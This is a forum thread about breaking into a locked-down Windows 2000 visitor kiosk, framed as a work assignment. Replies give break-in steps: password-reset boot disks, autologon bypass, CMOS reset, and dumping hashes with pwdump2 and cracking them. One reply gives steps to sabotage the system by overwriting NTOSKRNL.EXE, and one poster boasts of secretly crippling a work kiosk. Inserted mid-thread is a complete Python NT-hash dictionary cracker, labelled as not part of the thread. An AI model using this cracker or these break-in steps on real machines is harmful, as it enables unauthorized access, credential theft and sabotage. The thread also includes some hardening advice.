Work Assignment: "cracking" a secured box.

Keetha

Hello all. My boss has given me the assignment of cracking a box he secured. It is for the visitors in our tour area. He wants me to do something/anything at all that is not currently "allowed". He has everything disabled except for three things. We can shutdown/standby/restart. When we click on the Start button and go to Settings, the only thing there is the Printers menu. Open that up and we can either access the printer or add a new one. Other than that, when you click on the Start button and go to Programs, there is Internet Explorer. That's about all. We're mostly trying to get into the registry and the C: drive. The closest I can get is to open IE, go to File, then Open, but the C: drive doesn't show up. Thanks for any help.

PS. If you don't believe this is a work assignment but you are sure you have an answer, I can take some pictures. I work at Harley.
 
Try inserting a USB flash drive/CD and seeing if it auto-opens, and also try using autoplay to start up a program on the disk to crack passwords.
 
Yes, the autoplay feature works. But what would a password cracker be cracking? The only place we have to enter a password is during logon, I believe.
 
In IE you could try %windir%\system32\command.com, but I'm just guessing without access to the system. Sounds like fun though.
 
Lord: Access to "blahblahblah" has been disallowed. Thanks though.

puck: On second thought, thanks a lot. We're going to try to run sniffers from a disk and see what happens. We never really considered the CD-ROM drive.
 
Same access denied message when we try to run things from disk. This box has no USB, so that's not a path :(.
 
While this will win you the assignment, it doesn't really prove much.

If you have physical access to the box, steal it. Carry it away where you can work on it to your heart's content.

Immutable Law of Security #3
If a bad guy has unrestricted physical access to your computer, it's not your computer anymore.

 
How about the offline NT password reset tool, then have local admin rights. BAM.
 
I'm assuming that the HD is the primary boot device and surprised you even had physical access to the CD drive. Anyhow, he most likely went to HD Properties -> Security and denied complete access to the hard drive for a group he created, so that would be where to search for a workaround. I tried doing this myself and had access to everything in WINNT for some reason, which is plenty to muck things up if that's all someone wanted to do. But I've never had the need to seriously lock down a machine from someone. I'm sure you'll get root if you keep at it. (It is Windows after all.)
 
I don't see anywhere they said it wouldn't boot to the CD-ROM... even if it didn't... check the BIOS to see if it has a password on it... if not, change the boot order...

Knoppix or BartPE...
 
Is there a floppy drive?

Who are you protecting this from and what are they using the PC for? Is it an AD environment?

What OS? You said something about logging in? Is it a local account? If not, have you limited it to only that PC (in a network environment)?

Like the other guy said, just steal it if it's not locked down.
 
If you set a BIOS password, won't the Knoppix approach be exhausted?

Simple solution that will work, IIRC.
 
Insert the Offline NT Password Reset CD.

Reset the local admin account.

Root.
 
Open the case and pull the HD. Attach it to another PC.

File this under Rule # 3 =)
 
Party2go9820 said:
Immutable Law of Security #3
If a bad guy has unrestricted physical access to your computer, it's not your computer anymore.

Damn! You beat me to it.

Insert a password recovery CD, reboot, reset the local admin account, log in and make changes to your heart's delight.
 
Party2go: Stealing it isn't exactly what they had in mind. I don't think someone would be able to just walk out of the plant with it lolz.

Lord: I was told all of the lockdown was done through the registry, actually.

ghopke: Yes, there is a floppy. We're protecting this PC from the people who work in the touring area and possibly some of the tourists themselves. I know we use AD here a lot, but I don't know what this comp's involvement with it is. OS = Win2k. Actually, I seem to have been wrong about logging in; it just logs in when you turn it on.

I'll look into the password recovery CD thing and knoppix.

Thanks for your input everyone. I just got into work so I have stuff I have to do before I get started on this.
 
If he did it through the registry then you are probably in luck. Make a password-cracking floppy disk. There should be usable directions here: http://www.petri.co.il/index.htm

Then reboot the machine, set it to boot from floppy, and change the local admin password. Log in as local admin (there is very little chance he actually locked this account out with these settings or he'd never be able to make changes). Since he is using TweakUI or some other program to autologon as some chump user account, you will need to hit F8 during boot-up and select Safe Mode. This should prevent TweakUI or whatever from running and auto logging in. Then log in as local admin. Turn off the autologon program. Disable all accounts except for local admin, and you're the only one who knows the local admin password at this point. Ownage.

OR

Boot to the Windows Recovery Console from CD. Copy some random file over top of NTOSKRNL.EXE. The system won't even boot to Windows any more, and you can easily fix it by copying NTOSKRNL.EXE from the install CD back over through the Recovery Console.

Enjoy.
 
Interesting ideas floating around in here :)

But once and for all - the boot order is determined by the BIOS, and most likely the HD is set as the first and maybe only boot device.
So until there's access to the BIOS settings, all the boot devices in the world won't help you!

Now, in order to get access to the BIOS without breaking the case open:
1. Provided enough time without power, the CMOS battery will run dry ;)

2. Most BIOS manufacturers include a way to reset CMOS (including the password). (On ABIT boards you just have to hold Insert during boot-up.) Some motherboards do it provided 3-5 warm reboots in a row.

3. Some have the ability to alter the boot device by pressing a key on startup. (F12 usually, but not all, and sometimes it can be disabled.)

Look up the motherboard and check out the manual's BIOS settings.

On a side note, I guess your boss only locked it down to ensure guests can't get "root" and alter/own the machine. So most of the stuff here is probably useless, since it must be executed without making too much noise/unfamiliar pictures on the screen.

My best bet is, like Lord of Shadows said, IE; if the machine has internet access maybe you can point it at a site you control that can try and execute stuff... ActiveX, anyone?

-E

 
Keetha said:
Party2go: Stealing it isn't exactly what they had in mind. I don't think someone would be able to just walk out of the plant with it lolz.

Lord: I was told all of the lockdown was done through the registry, actually.

ghopke: Yes, there is a floppy. We're protecting this PC from the people who work in the touring area and possibly some of the tourists themselves. I know we use AD here a lot, but I don't know what this comp's involvement with it is. OS = Win2k. Actually, I seem to have been wrong about logging in; it just logs in when you turn it on.

I'll look into the password recovery CD thing and knoppix.

Thanks for your input everyone. I just got into work so I have stuff I have to do before I get started on this.


Hold down the Shift key to bypass the auto logon.
 
Thanks a lot guys. I got in. I did the method big daddy recommended. I booted to a floppy and then changed the password. And thanks for the tip oakfan, or I would have had a harder time getting in. Now we are going to change the boot order (it was already at floppy, CD, HDD), put a password on the BIOS, and maybe physically secure the box. They still need access to the floppy and CD-ROM though. I'll keep you updated on what comes up next.
 
shade91 said:
Doesn't sound like the box was too secured.

With the BIOS password and fixed boot order it would be (which I assumed was already done =)); one may also want to disable the default Administrator account as well to prevent a blind brute force.
 
Lord of Shadows said:
one may also want to disable the default Administrator account as well to prevent a blind brute force.

On any large network this is always a good idea. I run a 250-node network; when I add a new system with a freshly imaged disk, I immediately disable the default admin account and create one that only my staff are aware of. This will block anyone from trying to use the Administrator account (which by default has NO password unless specified during OS install).

Good job on figuring it out. But I have a question after the fact... was right-click -> Properties disabled? That way you could have right-clicked the taskbar, Properties, Start Menu and then re-enabled all of the programs, Control Panel... etc. I did not see this anywhere.
 
We put a secure password on the BIOS.
We changed the boot order.
Yes, the right-clicking was disabled :).
I'll recommend changing the name of the admin account, but I don't know what they'll do about that one. It might end up being more trouble than it's worth.
 
No trouble... only takes minutes... you don't want someone to be able to log in to the machine itself, rather than onto the network.

QJ
 
Umm... F8 during boot will still give a lot of access to the machine. I'm not very knowledgeable about 2k; is there any way to disable this... or password-protect it?

I used to pwn one of the kiosks at work every so often; the IT guy never figured out how I did it (or that it was me... :D). He always imaged an NT4 drive into the machine. It would boot correctly every time the first time, with everything installed exactly as it should. Every so often it would crash out and it would have to be unplugged to reboot (it ran some sort of Flash interface on the screen that couldn't be minimised, and Ctrl-Alt-Del was disabled... needless to say there was no way around it to just be able to reboot it). So you plug it back in; during boot it goes to a black screen and says "hit space bar to load last known good config", so I hit the space bar, and it would revert to a basic install of NT with no drivers (no NIC, video was stuck in 16 colors, touch screen didn't work... etc.). He'd come back out cussing because he had to fix the damn thing again...

thore
 
On the admin account topic: I use a GPO to rename every local admin and local guest account in the domain. Takes 5 seconds to do every machine.
 
big daddy fatsacks said:
On the admin account topic: I use a GPO to rename every local admin and local guest account in the domain. Takes 5 seconds to do every machine.

Do tell... :D

QJ
 
Keetha said:
Party2go: Stealing it isn't exactly what they had in mind. I don't think someone would be able to just walk out of the plant with it lolz.

You want to take bets on that one? Back in the early 90s I worked for The Computer Superstore (you can figure out which national chain that was), we had two computers stolen from the back display area. They unhooked them, picked them up, and walked out with them. No one stopped them. They were gone before anyone realized that anything was wrong.
 
If you can autorun then it's simple.

I will assume that you have no write access to any folders on the computer (if you did, it would be even easier).

Download pwdump2.exe and burn it onto a CD (or removable disk) with an autorun.inf that runs a batch file. This batch file should run pwdump2 and then pause. Now you need to write down the results from pwdump2 that you see on the screen. You only really need the line that contains the administrator account.

Now go home and create a text file and type in exactly what you wrote down above. Then download L0phtCrack or john the cracker and run it against the file you made. Let it run until it cracks the password (it could take anywhere from 5 seconds to 5 days).

Tada, you now have the local administrator password.
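The offline step of korpse's approach, as an added example that is not part of the thread or of pwdump2/L0phtCrack themselves: parse one line written down from the pwdump2 screen, pick out the built-in administrator by its RID (500, which survives a rename), and run a dictionary attack against the NT hash, which is MD4 over the UTF-16LE password with no salt. The line format `user:RID:LMhash:NThash:::`, the sample line and the word list are assumptions/constructed for the example; a pure-Python MD4 is included because many current OpenSSL builds no longer expose MD4 through hashlib.

```python
"""Offline dictionary attack on an NT hash copied from a pwdump2 line (added example)."""
import hashlib
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_pure(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320) fallback for interpreters whose OpenSSL lacks MD4."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    # Pad to 56 mod 64, then append the 64-bit little-endian bit length.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        r = state[:]
        for i in range(16):  # round 1: registers cycle a, d, c, b
            j = (-i) % 4
            r[j] = _lrot((r[j] + f(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                          + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
        for i in range(16):  # round 2
            j = (-i) % 4
            k = (i % 4) * 4 + i // 4
            r[j] = _lrot((r[j] + g(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                          + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        for i in range(16):  # round 3
            j = (-i) % 4
            r[j] = _lrot((r[j] + h(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                          + x[r3_order[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        state = [(s + v) & MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:  # "unsupported hash type md4" on OpenSSL 3 without legacy provider
        return _md4_pure(data)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str):
    """Split an assumed 'user:rid:lm_hex:nt_hex:::' line into its fields."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def is_builtin_admin(rid: int) -> bool:
    """RID 500 is the built-in Administrator whatever it has been renamed to."""
    return rid == 500


def crack_nt(nt_hex: str, wordlist):
    """Return the first word whose NT hash matches, or None if none does."""
    target = nt_hex.lower()
    for candidate in wordlist:
        if nt_hash(candidate) == target:
            return candidate
    return None


# Constructed sample: the built-in admin renamed to "kiosk" (still RID 500),
# LM and NT hashes of the password "password".
SAMPLE_LINE = "kiosk:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::"
SAMPLE_WORDLIST = ["harley", "letmein", "Password1", "password"]


def demo():
    user, rid, _lm, nt = parse_pwdump_line(SAMPLE_LINE)
    return user, is_builtin_admin(rid), crack_nt(nt, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print(demo())
```

Because the NT hash carries no salt, one precomputed list of hashes serves against every dump, which is why a rename alone buys little once the hashes are in hand; the LM column is ignored here but, where present and not disabled, is the far weaker target.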
 
ianshot said:
You want to take bets on that one? Back in the early 90s I worked for The Computer Superstore (you can figure out which national chain that was), we had two computers stolen from the back display area. They unhooked them, picked them up, and walked out with them. No one stopped them. They were gone before anyone realized that anything was wrong.


Well, to get it out they would have to go through a security gate. There is no way they will make it past security with it lolz.

Thanks for the idea korpse, I'll try it on Tuesday or Wednesday and let you all know how it goes. Too bad we can't disable CD/floppy (it's needed, they say). Any non-floppy/CD-related ideas now? Kind of hard to come up with them when you can't use the comp, I know.
 
QwertyJuan said:
Do tell... :D

QJ

I wanted to know too so I googled it:

Host Guest_Blim_MS
Q: njaneardude : do you recommend renaming the local Administrator account? Why or why not?

Host Guest_Blim_MS
A: Renaming the local Administrator account is a good recommendation. It provides further roadblocks for those attempting to gain unauthorized access to your network. Renaming administrator accounts can be done through the following GPO policy: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Rename administrator account.

 
Renaming the administrator account only works if the "hacker" isn't familiar with Windows. There are quick and easy methods to find a renamed admin account, and I have a boot CD here that will list all users along with their respective level of rights. Once I find the admin account (renamed or not) I can simply reset the password.
 
Well, if you can boot the system to a CD you can do whatever you want to the hard drive. I don't see how you could get a list of users with no read/write access to the HD with just a mouse and keyboard. (But if you know a way, do tell.)
 
If you have access to the machine you can do whatever the heck you want to it, there's no doubt about that. But renaming guest and admin will certainly foil a whole hell of a lot of brute-force guessing attacks, non?
SJConsultant said:
Renaming the administrator account only works if the "hacker" isn't familiar with Windows. There are quick and easy methods to find a renamed admin account, and I have a boot CD here that will list all users along with their respective level of rights. Once I find the admin account (renamed or not) I can simply reset the password.

This CD - are you talking about DumpSec?
 
Lord of Shadows said:
Well, if you can boot the system to a CD you can do whatever you want to the hard drive. I don't see how you could get a list of users with no read/write access to the HD with just a mouse and keyboard. (But if you know a way, do tell.)

See my comments at the end.

big daddy fatsacks said:
If you have access to the machine you can do whatever the heck you want to it, there's no doubt about that. But renaming guest and admin will certainly foil a whole hell of a lot of brute-force guessing attacks, non?

I will agree that it will foil the masses who use automated methods without taking into consideration that the account may have been renamed.

This CD - are you talking about DumpSec?

Nope. BlueCon by O&O creates a bootable disc using an existing Windows 2000 or XP along with a few tools. One of the command-line tools available is "user"; when run, it lists all local accounts and clearly indicates the local administrator account even if it was renamed. The other cmd-line tool is "passwd": simply type the command followed by the account name and the new password you want to set (e.g. passwd administrator test).

The only way to prevent the use of the local administrator account is to disable it. However, at present I am not aware of any tools or utilities that will re-enable the account.

The bootable CD allows full access to any files contained within the hard drive including system files.
 